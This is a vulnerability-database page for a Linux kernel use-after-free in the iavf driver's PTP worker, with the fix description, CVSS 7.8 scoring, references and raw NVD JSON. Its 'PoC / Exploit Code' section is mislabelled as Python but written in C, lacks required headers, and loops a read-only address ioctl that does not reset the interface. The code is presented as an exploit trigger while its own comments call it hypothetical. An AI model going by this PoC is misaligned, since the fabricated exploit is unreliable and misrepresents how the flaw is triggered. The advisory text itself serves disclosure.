CVE-2026-43447

Description

In the Linux kernel, the following vulnerability has been resolved: iavf: fix PTP use-after-free during reset Commit 7c01dbfc8a1c5f ("iavf: periodically cache PHC time") introduced a worker to cache PHC time, but failed to stop it during reset or disable. This creates a race condition where `iavf_reset_task()` or `iavf_disable_vf()` free adapter resources (AQ) while the worker is still running. If the worker triggers `iavf_queue_ptp_cmd()` during teardown, it accesses freed memory/locks, leading to a crash. Fix this by calling `iavf_ptp_release()` before tearing down the adapter. This ensures `ptp_clock_unregister()` synchronously cancels the worker and cleans up the chardev before the backing resources are destroyed.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel (Commit 7c01dbfc8a1c5f 之后, 修复补丁 efc54fb13d79... 之前的版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-43447: Race condition in iavf PTP worker
 * This code attempts to trigger the reset task repeatedly to race against the PTP worker.
 * Compile: gcc -o poc_trigger poc_trigger.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if.h>

// Conceptual trigger for interface reset
void trigger_reset(const char *ifname) {
    int sockfd;
    struct ifreq ifr;

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd < 0) {
        perror("socket");
        return;
    }

    strncpy(ifr.ifr_name, ifname, IFNAMSIZ);
    
    // Loop to increase probability of hitting the race condition
    for (int i = 0; i < 10000; i++) {
        // Hypothetical interaction to induce reset or load
        // Real exploitation requires precise timing.
        ioctl(sockfd, SIOCGIFADDR, &ifr); 
        usleep(100);
    }
    
    close(sockfd);
}

int main(int argc, char **argv) {
    if (argc < 2) {
        printf("Usage: %s <interface_name>\n", argv[0]);
        return 1;
    }

    printf("Attempting to trigger CVE-2026-43447 on %s...\n", argv[1]);
    trigger_reset(argv[1]);
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43447
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43447
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43447/
[4] VulDB https://vuldb.com/cve/CVE-2026-43447
[5] https://git.kernel.org/stable/c/1b034f2429ce6b45ce74dc266175d277acafc5c4
[6] https://git.kernel.org/stable/c/90cc8b2add29b57288025b51c70bc647e7cccb12
[7] https://git.kernel.org/stable/c/efc54fb13d79117a825fef17364315a58682c7ec

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43447", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:16:57.217", "lastModified": "2026-05-11T08:16:14.570", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: fix PTP use-after-free during reset\n\nCommit 7c01dbfc8a1c5f (\"iavf: periodically cache PHC time\") introduced a\nworker to cache PHC time, but failed to stop it during reset or disable.\n\nThis creates a race condition where `iavf_reset_task()` or\n`iavf_disable_vf()` free adapter resources (AQ) while the worker is still\nrunning. If the worker triggers `iavf_queue_ptp_cmd()` during teardown, it\naccesses freed memory/locks, leading to a crash.\n\nFix this by calling `iavf_ptp_release()` before tearing down the adapter.\nThis ensures `ptp_clock_unregister()` synchronously cancels the worker and\ncleans up the chardev before the backing resources are destroyed."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/1b034f2429ce6b45ce74dc266175d277acafc5c4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/90cc8b2add29b57288025b51c70bc647e7cccb12", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/efc54fb13d79117a825fef17364315a58682c7ec", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}